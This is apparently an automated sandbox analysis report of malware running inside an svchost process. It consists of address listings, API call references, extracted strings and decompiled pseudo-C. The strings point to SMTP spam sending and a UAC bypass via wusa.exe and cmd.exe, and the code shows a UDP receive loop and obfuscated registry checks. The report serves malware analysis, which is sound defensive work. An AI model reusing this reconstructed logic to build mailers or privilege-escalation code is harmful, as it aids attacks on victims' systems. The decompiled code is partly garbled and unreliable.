                                                                                0x0012aa4d
                                                                                0x0012aa52
                                                                                0x0012aa54
                                                                                0x0012aa54
                                                                                0x0012aa57
                                                                                0x0012aa68
                                                                                0x0012aa68
                                                                                0x0012aa6a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa70
                                                                                0x0012aa75
                                                                                0x0012aa77
                                                                                0x0012ab35
                                                                                0x0012ab35
                                                                                0x00000000
                                                                                0x0012ab35
                                                                                0x0012aa7d
                                                                                0x0012aa83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa89
                                                                                0x0012aa8f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa95
                                                                                0x0012aa98
                                                                                0x0012aab4
                                                                                0x0012aac1
                                                                                0x0012aac8
                                                                                0x0012aaca
                                                                                0x0012aadd
                                                                                0x0012aae4
                                                                                0x0012aae6
                                                                                0x0012aaec
                                                                                0x0012aaef
                                                                                0x0012ab00
                                                                                0x0012ab12
                                                                                0x0012ab1a
                                                                                0x0012ab29
                                                                                0x0012ab31
                                                                                0x0012ab33
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ab33
                                                                                0x0012aaf1
                                                                                0x0012aaf4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aaf6
                                                                                0x0012aaf9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aafb
                                                                                0x0012aafe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aafe
                                                                                0x0012aae8
                                                                                0x00000000
                                                                                0x0012aae8
                                                                                0x0012aacc
                                                                                0x0012aacc
                                                                                0x00000000
                                                                                0x0012aacc
                                                                                0x0012aaa2
                                                                                0x0012aaa9
                                                                                0x0012aaab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aaad
                                                                                0x00000000
                                                                                0x0012aaad
                                                                                0x0012aa59
                                                                                0x0012aa5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa61
                                                                                0x00000000
                                                                                0x0012aa61
                                                                                0x0012aa06
                                                                                0x0012aa0c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa0e
                                                                                0x0012aa14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa16
                                                                                0x0012aa1c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa1e
                                                                                0x0012aa24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa26
                                                                                0x0012aa2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa2e
                                                                                0x00000000
                                                                                0x0012aa2e
                                                                                0x0012a9db
                                                                                0x0012a8c8
                                                                                0x0012a8d2
                                                                                0x0012a8d4
                                                                                0x0012a8d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a8e2
                                                                                0x00000000
                                                                                0x0012a8eb
                                                                                0x0012a89c
                                                                                0x0012a8af
                                                                                0x0012a8b8
                                                                                0x00000000
                                                                                0x0012a8b8
                                                                                0x00000000
                                                                                0x0012a89c
                                                                                0x0012a7df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a7ed
                                                                                0x0012a7f0
                                                                                0x0012a7f3
                                                                                0x0012a803
                                                                                0x0012a7f5
                                                                                0x0012a7f5
                                                                                0x0012a7f5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a845
                                                                                0x0012a848
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a852
                                                                                0x0012a855
                                                                                0x0012a84d
                                                                                0x0012a84d
                                                                                0x0012a7fa
                                                                                0x0012a7fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a85c
                                                                                0x0012a85e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a86a
                                                                                0x0012a86c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a80a
                                                                                0x0012a80c
                                                                                0x0012a871
                                                                                0x0012a871
                                                                                0x0012a874
                                                                                0x0012a875
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a813
                                                                                0x0012a816
                                                                                0x0012a819
                                                                                0x0012a819
                                                                                0x0012a81b
                                                                                0x0012a81c
                                                                                0x0012a81c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a836
                                                                                0x0012a839
                                                                                0x0012a83c
                                                                                0x0012a83c
                                                                                0x0012a83e
                                                                                0x0012a83f
                                                                                0x0012a83f
                                                                                0x0012a820
                                                                                0x0012a824
                                                                                0x0012a82f
                                                                                0x0012a87a
                                                                                0x0012a87a
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$send$lstrlenrecv
                                                                                • String ID: .$ $AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                • API String ID: 3650048968-4264063882
                                                                                • Opcode ID: 2f329a3f4b7a1bd8e113ad93c62e3ad0bea1ce0ddfd2daa6c6e8bcb2006520b4
                                                                                • Instruction ID: f0f72bebd6bbf4854d0f560cd437055555478f80a4eb4b65468504e34f4c250c
                                                                                • Opcode Fuzzy Hash: 2f329a3f4b7a1bd8e113ad93c62e3ad0bea1ce0ddfd2daa6c6e8bcb2006520b4
                                                                                • Instruction Fuzzy Hash: 45A14272900335ABDF258B54FC96FAE7BA9EF14304FA40026F901A7090EB718DA8C757
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121280 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0012139A
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00121571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                • API String ID: 1628651668-1839596206
                                                                                • Opcode ID: fd5a0eb28bf2d33d7401fc2beee3285def1cbe5be193dcb222a95966e966d953
                                                                                • Instruction ID: 1da20bd64fadefcccb6ac3230834cbf5d35547e3056bc75404a7d54191c02b0f
                                                                                • Opcode Fuzzy Hash: fd5a0eb28bf2d33d7401fc2beee3285def1cbe5be193dcb222a95966e966d953
                                                                                • Instruction Fuzzy Hash: A0F198B1508351EFD324CF64D888BAAB7E5FBD8304F10492DF996D7290D7B49984CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122A62 Relevance: 27.2, APIs: 18, Instructions: 194networkmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00122A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E001226FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0012EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00122923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00122904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0012EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00122871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}










































                                                                                0x00122a62
                                                                                0x00122a7a
                                                                                0x00122a7d
                                                                                0x00122a86
                                                                                0x00122a8c
                                                                                0x00122a90
                                                                                0x00122aa0
                                                                                0x00122aa6
                                                                                0x00122aa8
                                                                                0x00122aae
                                                                                0x00122cd8
                                                                                0x00122cde
                                                                                0x00000000
                                                                                0x00122abd
                                                                                0x00122abd
                                                                                0x00122ac9
                                                                                0x00122ac9
                                                                                0x00122ad1
                                                                                0x00122ada
                                                                                0x00122ad3
                                                                                0x00122ad3
                                                                                0x00122ad3
                                                                                0x00122adb
                                                                                0x00122af4
                                                                                0x00122af9
                                                                                0x00122afe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122b06
                                                                                0x00122b0e
                                                                                0x00122b14
                                                                                0x00122b18
                                                                                0x00122b20
                                                                                0x00122b24
                                                                                0x00122b28
                                                                                0x00122b30
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122b3a
                                                                                0x00122b3f
                                                                                0x00122b4a
                                                                                0x00122b50
                                                                                0x00122b52
                                                                                0x00122b58
                                                                                0x00122b6a
                                                                                0x00122b76
                                                                                0x00122b7c
                                                                                0x00122ca6
                                                                                0x00122cad
                                                                                0x00122cb3
                                                                                0x00122cbd
                                                                                0x00122cc7
                                                                                0x00122ccd
                                                                                0x00122ce0
                                                                                0x00000000
                                                                                0x00122ce0
                                                                                0x00122b85
                                                                                0x00122b96
                                                                                0x00122b98
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122ba1
                                                                                0x00122ba6
                                                                                0x00122ba7
                                                                                0x00122bad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122bb3
                                                                                0x00122bb8
                                                                                0x00122bbd
                                                                                0x00122bbf
                                                                                0x00000000
                                                                                0x00122bc9
                                                                                0x00122bd1
                                                                                0x00122c77
                                                                                0x00122c77
                                                                                0x00122c79
                                                                                0x00122c7f
                                                                                0x00122bc5
                                                                                0x00000000
                                                                                0x00122bc5
                                                                                0x00000000
                                                                                0x00122bf3
                                                                                0x00122c08
                                                                                0x00122c0c
                                                                                0x00122c85
                                                                                0x00122c89
                                                                                0x00122c93
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122c93
                                                                                0x00122c12
                                                                                0x00122c1d
                                                                                0x00122c21
                                                                                0x00122c25
                                                                                0x00122c32
                                                                                0x00122c3e
                                                                                0x00122c41
                                                                                0x00122c4a
                                                                                0x00122c4b
                                                                                0x00122c5f
                                                                                0x00122c63
                                                                                0x00122c69
                                                                                0x00122c71
                                                                                0x00122c6b
                                                                                0x00122c6b
                                                                                0x00122c6b
                                                                                0x00122c4d
                                                                                0x00122c57
                                                                                0x00122c57
                                                                                0x00122c73
                                                                                0x00000000
                                                                                0x00122c73
                                                                                0x00122bd1
                                                                                0x00122bc9
                                                                                0x00122b8b
                                                                                0x00122b90
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122b90
                                                                                0x00122c95
                                                                                0x00122c95
                                                                                0x00122c9e
                                                                                0x00122ac3
                                                                                0x00122ac7
                                                                                0x00000000
                                                                                0x00122ac7
                                                                                0x00000000
                                                                                0x00122ca4
                                                                                0x00122ac9
                                                                                0x00122aae
                                                                                0x00000000

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,74CB4F20), ref: 00122A83
                                                                                • HeapAlloc.KERNEL32(00000000,?,74CB4F20), ref: 00122A86
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00122AA0
                                                                                • htons.WS2_32(00000000), ref: 00122ADB
                                                                                • select.WS2_32 ref: 00122B28
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00122B4A
                                                                                • htons.WS2_32(?), ref: 00122B71
                                                                                • htons.WS2_32(?), ref: 00122B8C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00122BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 1639031587-0
                                                                                • Opcode ID: 0853a2dd3052e008811e50229d9027bc9eabe50b93a337fe5b7a7dbbbef7b31d
                                                                                • Instruction ID: 4375dfb5966830756132825d2f4ab811fef39558848024788505553cf470af0f
                                                                                • Opcode Fuzzy Hash: 0853a2dd3052e008811e50229d9027bc9eabe50b93a337fe5b7a7dbbbef7b31d
                                                                                • Instruction Fuzzy Hash: AA61E471904325BFC7219F64EC48B6FBBE8FF88751F010809F94597250D7B4D8A08BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012704C Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 332registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0012704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				int _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				void* _t166;
				int _t196;
				int _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				void* _t207;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0012EE2A(_t167, 0x1322f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00126DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0012EED1( &_v64, E00122544(0x1322f8,  &E001306A0, 9, 0xe4, 0xc8));
						_t206 = _t204 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0012EE95( &_v364, E00122544(0x1322f8,  &E0013069C, 4, 0xe4, 0xc8));
							E0012EE2A(_t167, 0x1322f8, 0, 0x100);
							_t207 = _t206 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0012EF00( &_v364,  &_v363);
									_t149 = E0012ED23( &_v364, 0x22);
									_t207 = _t207 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0012EE95( &_v364, E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8));
								E0012EE2A(_t167, 0x1322f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0012ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0012ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00126CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											asm("popad");
											asm("popad");
											asm("popad");
											asm("popad");
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = 0x1322f8;
											_t166 = 0xad;
											_t123 = E00126C96(0x1322f8);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0012EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											_t71 = _t166 - 0x40; // 0x1322b8
											__eflags = _t71 - 0x3f;
											if(_t71 > 0x3f) {
												goto L57;
											}
											__eflags = 0xf8 - 0x10;
											if(0xf8 >= 0x10) {
												goto L57;
											}
											_t202 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t202;
											if(_t202 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t202 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0012EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0012EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0012EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0012EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0012EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00126CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0012EE2A(_t167, 0x1322f8, 0, 0x100);
							_t204 = _t206 + 0xc;
							goto L18;
						}
						_t158 = E0012F1A5( &_v64);
						_t167 = _v32 ^ 0x61616161;
						__eflags = _t158 - (_v32 ^ 0x61616161);
						if(_t158 == (_v32 ^ 0x61616161)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}









































                                                                                0x00127055
                                                                                0x00127058
                                                                                0x0012705a
                                                                                0x00127061
                                                                                0x00127068
                                                                                0x00127071
                                                                                0x00127073
                                                                                0x00127073
                                                                                0x00127075
                                                                                0x0012707a
                                                                                0x0012707c
                                                                                0x0012707c
                                                                                0x0012707e
                                                                                0x00127083
                                                                                0x00127085
                                                                                0x00127085
                                                                                0x00127087
                                                                                0x0012708c
                                                                                0x0012708e
                                                                                0x0012708e
                                                                                0x001270b4
                                                                                0x001270b9
                                                                                0x001270ca
                                                                                0x001271b8
                                                                                0x001271c8
                                                                                0x00000000
                                                                                0x001270d0
                                                                                0x001270d0
                                                                                0x001270d8
                                                                                0x001270df
                                                                                0x001270e3
                                                                                0x001270e4
                                                                                0x001270e9
                                                                                0x001270ed
                                                                                0x001270ee
                                                                                0x001270f1
                                                                                0x001270f2
                                                                                0x001270f5
                                                                                0x0012719b
                                                                                0x0012719e
                                                                                0x001271a9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001270fb
                                                                                0x001270fd
                                                                                0x0012716e
                                                                                0x0012716e
                                                                                0x0012716e
                                                                                0x0012716e
                                                                                0x00127174
                                                                                0x0012717b
                                                                                0x0012717f
                                                                                0x00127180
                                                                                0x00127185
                                                                                0x00127189
                                                                                0x0012718a
                                                                                0x0012718d
                                                                                0x00127194
                                                                                0x00000000
                                                                                0x00127194
                                                                                0x001270ff
                                                                                0x00127102
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127104
                                                                                0x00127107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127109
                                                                                0x0012710d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127123
                                                                                0x00127128
                                                                                0x0012712d
                                                                                0x0012712f
                                                                                0x0012712f
                                                                                0x00127130
                                                                                0x00127133
                                                                                0x001271d0
                                                                                0x001271f4
                                                                                0x001271f7
                                                                                0x001271fc
                                                                                0x001271ff
                                                                                0x00127203
                                                                                0x00127227
                                                                                0x0012722e
                                                                                0x0012723e
                                                                                0x0012724c
                                                                                0x00127251
                                                                                0x00127254
                                                                                0x00127256
                                                                                0x00127258
                                                                                0x00127258
                                                                                0x00127256
                                                                                0x00127280
                                                                                0x00127282
                                                                                0x0012728a
                                                                                0x0012728c
                                                                                0x001272c2
                                                                                0x001272c9
                                                                                0x001272cb
                                                                                0x001272e6
                                                                                0x001272e8
                                                                                0x001272ef
                                                                                0x001272f2
                                                                                0x001272f4
                                                                                0x00127301
                                                                                0x00127301
                                                                                0x00127301
                                                                                0x001272f6
                                                                                0x001272fc
                                                                                0x001272fc
                                                                                0x00127307
                                                                                0x0012730d
                                                                                0x0012730f
                                                                                0x00127335
                                                                                0x00127336
                                                                                0x00127337
                                                                                0x00127338
                                                                                0x00127339
                                                                                0x0012733e
                                                                                0x0012734b
                                                                                0x0012734e
                                                                                0x00127354
                                                                                0x0012735b
                                                                                0x0012735d
                                                                                0x001273d5
                                                                                0x001273d8
                                                                                0x001273de
                                                                                0x001273e2
                                                                                0x001273eb
                                                                                0x001273f1
                                                                                0x001273f2
                                                                                0x001273f4
                                                                                0x001273f7
                                                                                0x00000000
                                                                                0x001273f7
                                                                                0x0012735f
                                                                                0x00127362
                                                                                0x00127365
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012736d
                                                                                0x00127370
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127372
                                                                                0x00127375
                                                                                0x0012737a
                                                                                0x0012737c
                                                                                0x0012738d
                                                                                0x00127393
                                                                                0x00127395
                                                                                0x00127397
                                                                                0x00127397
                                                                                0x00127395
                                                                                0x0012739d
                                                                                0x001273a0
                                                                                0x001273a2
                                                                                0x001273a4
                                                                                0x001273a4
                                                                                0x001273a6
                                                                                0x001273a9
                                                                                0x001273b2
                                                                                0x001273b8
                                                                                0x001273b9
                                                                                0x001273bc
                                                                                0x001273c4
                                                                                0x001273ca
                                                                                0x001273cb
                                                                                0x001273cd
                                                                                0x00000000
                                                                                0x00127311
                                                                                0x00127314
                                                                                0x0012731a
                                                                                0x0012731d
                                                                                0x00127326
                                                                                0x0012732c
                                                                                0x0012732d
                                                                                0x00000000
                                                                                0x0012732d
                                                                                0x0012730f
                                                                                0x001272d0
                                                                                0x001272d6
                                                                                0x00000000
                                                                                0x0012728e
                                                                                0x00127291
                                                                                0x00127297
                                                                                0x0012729a
                                                                                0x001272a3
                                                                                0x001272a9
                                                                                0x001272aa
                                                                                0x001272aa
                                                                                0x001272ac
                                                                                0x001272af
                                                                                0x001272b2
                                                                                0x001271cb
                                                                                0x001271cf
                                                                                0x001271cf
                                                                                0x0012728c
                                                                                0x00127208
                                                                                0x0012720e
                                                                                0x00127212
                                                                                0x0012721b
                                                                                0x00127221
                                                                                0x00127224
                                                                                0x00000000
                                                                                0x00127224
                                                                                0x0012713d
                                                                                0x00127142
                                                                                0x00127143
                                                                                0x00127145
                                                                                0x0012715e
                                                                                0x00127166
                                                                                0x0012716b
                                                                                0x00000000
                                                                                0x0012716b
                                                                                0x0012714b
                                                                                0x00127154
                                                                                0x0012715a
                                                                                0x0012715c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012715c
                                                                                0x001271b2
                                                                                0x00000000
                                                                                0x001271b2

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,74CB43E0,?,74CB43E0,00000000), ref: 001270C2
                                                                                • RegEnumValueA.ADVAPI32(74CB43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,74CB43E0,00000000), ref: 0012719E
                                                                                • RegCloseKey.ADVAPI32(74CB43E0,?,74CB43E0,00000000), ref: 001271B2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00127208
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00127291
                                                                                • ___ascii_stricmp.LIBCMT ref: 001272C2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 001272D0
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00127314
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0012738D
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 001273D8
                                                                                  • Part of subcall function 0012F1A5: lstrlenA.KERNEL32(000000C8,000000E4,001322F8,000000C8,00127150,?), ref: 0012F1AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                • String ID: $"
